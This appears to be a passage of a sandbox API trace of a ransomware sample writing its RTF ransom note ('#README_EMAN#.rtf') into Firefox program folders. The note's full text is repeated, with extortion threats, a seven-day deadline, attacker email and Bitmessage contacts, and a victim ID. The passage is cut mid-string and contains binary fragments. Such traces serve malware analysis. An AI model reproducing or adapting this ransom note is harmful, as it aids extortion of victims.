https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0220.378] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x38dfac8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\\\x1e4=a\x99ª\x8d\\Ë\x04`\x1b\x1ehG(\"…ê\x19Ö0\x03ã\x08", lpUsedDefaultChar=0x0) returned 8717 [0220.378] WriteFile (in: hFile=0x2d0, lpBuffer=0x38dfac8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x38dfac8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0220.379] CloseHandle (hObject=0x2d0) returned 1 [0220.379] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\#readme_eman#.rtf")) returned 0x20 [0220.379] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\#readme_eman#.rtf")) returned 0xffffffff [0220.379] GetLastError () returned 0x2 [0220.379] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0220.379] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 